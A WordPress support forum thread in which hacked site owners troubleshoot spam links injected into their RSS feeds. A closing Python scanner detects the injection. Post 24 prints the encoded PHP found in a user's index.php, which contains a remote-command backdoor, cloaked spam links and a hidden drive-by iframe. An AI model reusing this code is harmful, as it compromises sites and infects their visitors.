Link Spam in embedded RSS (27 posts)

  1. Betelguese
    Member
    Posted 4 years ago #

    Hi, can someone help?

    I have spent months building a site with WordPress, and have a high ranking on Google. Recently the outgoing RSS feed from my site has not been working; running it through a feed validation site, I get the resulting error line

    This feed does not validate

    Line 176, column 15: XML parsing error: <unknown>:176:15: junk after document element

    …with a whole load of link spam showing up immediately after this highlighted line…

    <!-- google --><font style="position: absolute;overflow: hidden;height: 0;width: 0">

    When I update wordpress the problem goes away and my RSS feed works, but only to return around 2 days later with the same problem…spam in my RSS feed and it not working. I installed the “bad behaviour” plugin immediately after updating but the problem comes back.

    What can I do, short of wiping my WordPress installation and starting again? I want to act fast as I don't want my Google rankings affected.

    I have backups of exported XML files from my wordpress site.

    Thanks

  2. esmi
    Forum Moderator
    Posted 4 years ago #

  3. styleanywhere
    Member
    Posted 4 years ago #

    I have the same problem with my feeds.

    "with a whole load of link spam showing up immediately after this highlighted line…"

    I don't know what to do with my feeds either.

    I need help also.

    thanks in advance

  4. styleanywhere
    Member
    Posted 4 years ago #

    @esmi:

    Does this mean that the site has been hacked?

    thanks,

  5. Betelguese
    Member
    Posted 4 years ago #

    I'm running WordPress 2.8.6; if I update it then the link spam in my RSS disappears and the RSS works OK. But then a day or two later the link spam comes back, and my RSS goes down again. I have added security plugins since the hack, but I think this is like shutting the door after the horse has bolted.

    Updating wordpress does not wipe the problem, it just comes back. I think I need to delete wordpress from my web host (justhost) and do a fresh install. I have exported XML files from my WP site to import after I reinstall WP, but I'm not sure if this includes my images.

  6. styleanywhere
    Member
    Posted 4 years ago #

    @Betelguese:

    Hi. I hope you don't mind, did it work? Deleting all WordPress files on the server and installing a new one?

    Thanks

  7. Betelguese
    Member
    Posted 4 years ago #

    Hi

    This is driving me CRAZY !!

    I wiped my wordpress installation and installed a new one, but before this I made a full backup from my host, (maybe containing the hack). I imported a recently made XML backup file into the fresh installation, and it showed up as a basic site with my posts, but without plugins or images.

    I then restored the full backup of my site I made from my host, and my site was completely restored. I have been checking the RSS feed every day and it has been ok, I thought I had got rid of it.

    But now, around a week later the problem has come back.

    (RSS feed contains errors)

    I think I will have to wipe wordpress again, import a recent XML file, and then manually add all my images. A tough job as my site has 64 pages.

    Can anyone offer any suggestions or help?

    I have the "Bad Behaviour", "Project Honeypot", and "secure wordpress" plugins installed, but these do not seem to stop it

    Thanks

  8. Betelguese
    Member
    Posted 4 years ago #

    I think I have located the problem.

    When I view the browser source code I find this dodgy-looking line of JavaScript at the bottom of every page on my site.

    </script><script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>

    Bear with me, I'm a newbie at this stuff...

    How do I get rid of this? I have looked through my PHP files, without finding it

  9. addtoany.com is a sharing utility that you added somewhere along the way. It's not dodgy and it's not going to add itself.

    Check your plugins, check footer.php and search your database with Search RegEx for the javascript.

  10. Betelguese
    Member
    Posted 4 years ago #

    Thanks songdogtech,

    Oh yes of course, that url and javascript is just from a plugin I added a while back. I seemed to start getting problems with the hack since I added a Youtube plugin, that could be just a coincidence but will delete it anyway.

    I will try running a plugin called "Exploit Scanner", and also "SearchRegEx" as you said.

    I don't know how these spammers and hackers can sleep at night, spewing their junk all over people's hard work.

  11. Also see How to Completely Clean a Hacked WordPress Install and check for hidden administrators and change your passwords, too.....

  12. Betelguese
    Member
    Posted 4 years ago #

    I cannot get rid of this problem...

    I have deleted my wordpress installation numerous times, and restored backups from before the hack as far as I know, and the RSS still breaks down with inserted spam.

    Now I've wiped and reinstalled wordpress and not even restored any backups, but started my site from scratch with only security plugins installed. A day later the same problem came back with a "junk after document element" error when I ran it through feed validator, showing a whole load of spam.

    My Web host Justhost are no help, they said they will fix the problem but have not. I wrote a detailed email describing what is happening and their reply was "Change your passwords and run a virus checker on your computer"...ridiculous! I have done that plenty of times.

    I am deleting and reinstalling WP and not altering or deleting anything else. When I delete WP, if I then go to my files and see anything that is still there that looks like a WP file, should I be deleting that as well?

    Obviously a fresh install is not removing the problem.

    Any suggestions or help would be very much appreciated...

    Thanks.

  13. Roy
    Member
    Posted 4 years ago #

    Just a thought, when you reinstall, you delete the WP files, but you use the same database? What if that database contains a user that just logs in and inserts the spam?
    Alternatively, did you download your theme and upload it again after the new install? What if that theme is full of rogue code?
    Twice you have been referred to the "how to completely clean a hacked wordpress blog", did you read it and do everything it said?

  14. Betelguese
    Member
    Posted 4 years ago #

    As I delete WP it says that the MySQL database, and the MySQL user will be deleted.

    Also yes, I have re-uploaded the theme after a new install.

    I have read "how to completely clean a hacked wordpress blog", but I'm slightly unsure about deleting individual files on the server.

    Thanks for the help Gangleri, but I think I will really need to talk to my web host as it seems to be the root of the problem.

  15. Roy
    Member
    Posted 4 years ago #

    Yep, it could very well be another site on the shared server...

  16. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    Also, do you delete ALL files on your server? Do you have anything else running? Any other files, any other programs, etc?

    When I was hacked, the problem never was in my WP installation, it was in 2 other software packages I had running, buried way deep. There were 2 rogue php files in those software packages being used to spam my WP install

  17. Betelguese
    Member
    Posted 4 years ago #

    Hmm...good points Gangleri and RVoodoo !

    This is a tricky one.

    I recently discovered I had anonymous ftp access allowed, this must be set to default on my web host as I've never touched it. That's a definite security hole right there. I have now obviously blocked it.

    I will make doubly sure that it's not a dodgy plugin doing it, and look at other possible sources on the server.

  18. styleanywhere
    Member
    Posted 4 years ago #

    Hi Betelguese,

    I have the same problem, and I couldn't find a solution to it. Were you able to fix it?

    Thanks

  19. QuilterChic
    Member
    Posted 4 years ago #

    I am also having the same problem. Did you find a fix?

  20. nymphe
    Member
    Posted 3 years ago #

    I have the same problem as well. I am using WordPress 3.0.1

    Except for this RSS validation issue I don't have any problems. Where can this be? What is this information called? If you give the address like yoursite.com/rss, the rss.php script in wp-includes is called. I've checked those files and they are clean. Where does the rest come from?

    This is the result: http://feedvalidator.org/check.cgi?url=turkmac.com%2ffeed

  21. Try deactivating all plugins. If that resolves the issue, reactivate each one individually until you find the cause.

    If that does not resolve the issue, try switching to the Default theme (WordPress 1.5 - 2.9.2) or the Twenty Ten theme (WordPress 3.0 and higher) to rule-out a theme-specific issue (themes can affect feeds).

  22. nymphe
    Member
    Posted 3 years ago #

    Thank you for the quick answer. I already tried that. I switched themes, tried other ones including the standard one and disabled all plugins. RSS junk is there. It begins so:

    <!-- linksnkl --> <style>.zjg{position: absolute; overflow: auto; height: 0; width: 0;}</style><li class=zjg> <a href=http://quietcornerwildlife.com/

  23. In that case, the junk could have been inserted into almost any of the core files. Remain calm and carefully follow this guide. When you're done, you may want to implement some (if not all) of the recommended security measures.

  24. cnymike
    Member
    Posted 3 years ago #

    I noticed the same thing when I tried to publish an RSS feed to Feedburner. Sure enough, I checked the validation and found this hidden code in my index.php file...

    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    ?><?php eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwppZigkX1JFUVVFU1RbJ2RmcXczMWYnXSkKZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFsnZGZxdzMxZiddKSk7CiRocmVmID0gJ2h0dHA6Ly93d3cucHJvc29mdHdhcmVzdG9yZS5jb20vJzsKJHdvcmRzID0gYXJyYXkoJ1NvZnR3YXJlIFN0b3JlJywgJ01pY3Jvc29mdCBTb2Z0d2FyZScsICdBZG9iZSBTb2Z0d2FyZScsICdBdXRvZGVzayBTb2Z0d2FyZScsICdCb3JsYW5kIFNvZnR3YXJlIHNob3AnLCAnVk13YXJlIFNvZnR3YXJlJywgJ1Nob3AgU29mdHdhcmUnLCAnTUFDIFNvZnR3YXJlJywgJ1dpbmRvd3MgU29mdHdhcmUnLCAnU3ltYW50ZWMgc2hvcCcpOwoka2V5bnVtID0gY291bnQoJHdvcmRzKTsKJGFsdHMgPSAkd29yZHM7CgokciA9IHJhbmQoMCwgMyk7CiRyMiA9IHJhbmQoNCwgNyk7CiRyMyA9IHJhbmQoOCwgJGtleW51bS0xKTsKc2h1ZmZsZSgkYWx0cyk7CmZvcigkaT0wOyAkaTwka2V5bnVtOyAkaSsrKQp7CmlmKCRpPT0kciB8fCAkaT09JHIyIHx8ICRpPT0kcjMpCnsKJHI0ID0gcmFuZCgxLCAzKTsKJHN0ciA9IGltcGxvZGUoIiAiLCBhcnJheV9zbGljZSgkd29yZHMsIDAsIHJhbmQoMSwgaW50dmFsKCRrZXludW0vMikrMSkpKTsKJGFsdHNbJGldID0gIjxoND48YSBocmVmPVwiJGhyZWZcIiBhbHQ9XCIkc3RyXCIgdGl0bGU9XCIkc3RyXCI+U2hvcCAiLiRhbHRzWyRpXS4iPC9hPjwvaDQ+IjsKfQp9CmFycmF5X3B1c2goJGFsdHMsICI8YSBocmVmPVwiJGhyZWZcIj4kaHJlZjwvYT4iKTsKc2h1ZmZsZSgkYWx0cyk7CiRzdHIgPSBpbXBsb2RlKCIgIiwgJGFsdHMpOwppZihwcmVnX21hdGNoKCIvKGNyYXdsKXwoZ29vZ2xlKXwoeWFob28pfChiaW5nKXwoc3B5KXwoYm90KXwocGVybCl8KHB5dGhvbil8KGhvbG1lcyl8KGFsZXhhKXwoYi1vLXQpfChmaW5kbGlua3MpfChpY2hpcm8pfChsYXJiaW4pfChsaW5rKXwobHdwKXwoUHljVVJMKXwoc2NydWJieSl8KHNlYXJjaCl8KHN0YWNrKXwodXBkYXRlZCkvaSIsICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkpCmVjaG8oIjxkaXYgYWxpZ249Y2VudGVyPiRzdHI8L2Rpdj4iKTsKZWxzZQplY2hvKCI8Zm9udCBzdHlsZT1cInBvc2l0aW9uOi8qKi9hYnNvbHV0ZTtvdmVyZmxvdzovKiovaGlkZGVuOy8qKi93aWR0aDovKiovMFwiPiRzdHI8YSBocmVmPSckaHJlZic+JGhyZWY8L2E+PC9mb250PiIpOw==")); ?>
    <?php eval(base64_decode("aWYocHJlZ19tYXRjaCgiL3J1L2kiLCRfU0VSVkVSWydIVFRQX0FDQ0VQVF9MQU5HVUFHRSddKSkNCgkJZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly9hZGhlc2l2ZXN0cmVuZ3RoLmluL2luLmNnaT8xODQiIGZyYW1lYm9yZGVyPSIwIiB3aWR0aD0iMyIgaGVpZ2h0PSIzIiBzdHlsZT0idmlzaWJpbGl0eTogaGlkZGVuOyI+PC9pZnJhbWU+Jzs=")); ?>

    Not only that, I checked my server file modification dates and found at least one other file that had been hacked, the 404.shtml file which is a host file, not a WordPress file. It had the following code

    <!-- SHTML Wrapper - 404 Not Found -->
    <!--#exec cgi="/cgi-sys/fourohfour.cgi" -->

    My webhost is BlueHost by the way.

    Ominously, I checked another entirely different account I have on BlueHost and it too had the same files hacked. These were also WordPress sites.

    So right now I'm not quite sure if it's WordPress that has the problem, my Webhost, or a combination of both. But I find this deeply troubling.

  25. cnymike
    Member
    Posted 3 years ago #

    I've just discovered others talking about this...
    http://womm.leolincourt.com/fourohfourcgi-is-this-a-website-hack-attempt

    My 404.shtml file had been modified on 10/7/10 while my index.php file had been modified on 10/21/10.

    All my WordPress sites on BlueHost, on two different accounts have been hacked in the same way.

    This is a huge problem that needs more input from others.

  26. bh_WP_fan
    Member
    Posted 3 years ago #

    cnymike: The mentioned 404 page code does *not* appear to be a hack. Yes, the feed looks bad. See the above suggestions for that.

    As for the 404, I do not believe this to be a problem. The following code is the default code loaded into a brand-new generated BlueHost 404 page.

    <!--#exec cgi="/cgi-sys/fourohfour.cgi" -->

    As you can see, it is making a call to a directory called cgi-sys which is on a root level of the server and not accessible to view.

    My guess would be that BlueHost manages the default 404 page in that directory and that, when they made a change to their 404 page, they likely made a change to how their own default 404.shtml files were handled as well.

    You can test this by creating any random subdomain and then checking the files loaded in there by default. Your 404.shtml page will bear that code by default.

  27. cnymike
    Member
    Posted 3 years ago #

    Further research does confirm that the odd looking 404.shtml code is not a hack but a change in system generated 404. It was a coincidental but unrelated event.

    The hack on the index.html file on the other hand is indeed the result of nefarious activity and it's not clear whether it was a plugin, theme or what that caused it. But there it is and the base64 code, once decoded, indicates links to two sites, one of which has as its purpose a drive-by download to your computer.

    Nasty.
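
Added example (not part of any post in this thread, and not WordPress code): a static scanner for the `eval(base64_decode("..."))` pattern that post 24 found appended to index.php. It decodes each blob without executing it and reports the URLs and a few heuristic traits; the trait labels, the file extensions checked and the sample input are assumptions of this example.

```python
import base64
import os
import re

# eval(base64_decode("...")) as appended to index.php in post 24; either quote style.
INJECT_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""", re.I)
URL_RE = re.compile(r"""https?://[^\s'"<>\\)]+""", re.I)
# Heuristic labels chosen for this example; applied to the decoded text only.
TRAITS = {
    "request-driven eval": re.compile(r"eval\s*\([^;]*\$_(REQUEST|GET|POST|COOKIE)", re.I),
    "header-based cloaking": re.compile(r"HTTP_(USER_AGENT|ACCEPT_LANGUAGE)", re.I),
    "css-hidden markup": re.compile(
        r"(height|width)\s*:\s*(?:/\*.*?\*/)?\s*0(?![\d.])|visibility\s*:\s*hidden", re.I),
}

def scan_php_source(source):
    """Decode each eval(base64_decode(...)) argument statically; never execute it."""
    findings = []
    for m in INJECT_RE.finditer(source):
        try:
            decoded = base64.b64decode(m.group(2)).decode("utf-8", "replace")
        except ValueError:  # bad padding or corrupt blob: still report the call
            decoded = ""
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "urls": sorted(set(URL_RE.findall(decoded))),
            "traits": [t for t, rx in TRAITS.items() if rx.search(decoded)],
        })
    return findings

def scan_tree(root):
    """Map each PHP file under root to its findings (files with none are omitted)."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".phtml", ".inc")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_php_source(fh.read())
                if found:
                    hits[path] = found
    return hits

# Constructed sample (not the payload from the thread): a cloaked hidden link.
SAMPLE_PAYLOAD = ("if(preg_match('/bot/i', $_SERVER['HTTP_USER_AGENT'])) echo "
                  "'<font style=\"height:0;width:0\"><a href=\"http://spam.example/\">x</a></font>';")
SAMPLE_INDEX_PHP = ("<?php\nrequire('./wp-blog-header.php');\n?><?php eval(base64_decode(\""
                    + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode() + "\")); ?>\n")
```

`scan_tree` is meant to be pointed at the whole account's document root rather than only the WordPress directory, since posts 16 and 24 both report modified files outside the WordPress install.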


This topic has been closed to new replies.
